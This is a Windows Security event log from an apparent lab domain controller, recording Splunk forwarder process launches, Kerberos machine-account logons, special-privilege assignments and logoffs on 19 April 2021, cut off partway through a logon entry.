Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1548
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:06:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264352
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1428
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:06:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264353
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x83c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:06:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264355
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:06:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264354
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aa0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:06:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264359
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FA424
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:06:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264358
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7FA424
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62558
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:06:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264357
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FA424
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:07:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264361
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bd0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:07:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264360
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ac8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:07:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264362
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x173c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:07:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264363
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:07:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264365
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7FC030
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62564
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:07:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264364
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FC030
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:07:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264366
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:07:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264368
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:07:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264367
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1aa8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264374
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FD788
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264373
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7FD788
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62569
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264372
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FD788
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264371
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FD71C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264370
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7FD71C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62568
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:07:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264369
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FD71C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:07:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264377
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FE41A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:07:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264376
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
